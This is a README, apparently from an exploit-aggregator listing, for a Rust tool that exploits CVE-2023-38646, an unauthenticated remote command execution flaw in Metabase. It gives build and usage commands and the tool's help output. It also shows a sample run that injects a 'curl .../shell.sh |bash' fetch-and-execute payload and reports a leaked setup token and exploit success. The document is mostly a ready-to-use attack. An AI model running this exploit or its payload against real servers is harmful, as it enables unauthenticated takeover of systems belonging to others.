## https://sploitus.com/exploit?id=5C4BFB25-8EF6-579D-971B-C9E3E41A5CD7
# CVE-2023-38646

<p align="left">
	<a href="https://www.rust-lang.org/"><img src="https://img.shields.io/badge/made%20with-Rust-red"></a>
	<a href="#"><img src="https://img.shields.io/badge/platform-osx%2Flinux%2Fwindows-blueviolet"></a>
</p>

- [Overview](#overview)
- [Compile](#compile)
- [Usage](#usage)
- [Running CVE-2023-38646](#running-cve-2023-38646)

# Overview

Metabase is an open-source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources.
This vulnerability, designated CVE-2023-38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication.


# Compile

First, compile the tool with:

```sh
cargo build --release
```

# Usage

You can run the tool in either of these two ways:
```sh
cargo run -- --url http://localhost --command "curl <ip>" 
```

```sh
.\target\release\cve_2023_38646 --url http://localhost --command "curl <ip>" 
```

The tool's help output lists all the switches it supports:

```console
CVE-2023-38646

Usage: cve_2023_38646 --url <URL> --command <COMMAND>

Options:
  -u, --url <URL>          Insert URL
  -c, --command <COMMAND>  Insert command
  -h, --help               Print help
```

# Running CVE-2023-38646

```console
cargo run -- --url http://example.com --command "curl 127.0.0.1/shell.sh |bash"

[+] Token: 7cdac991-5fbd-4c3c-b6a7-0c80b3f66abc
[+] Exploit Success!
```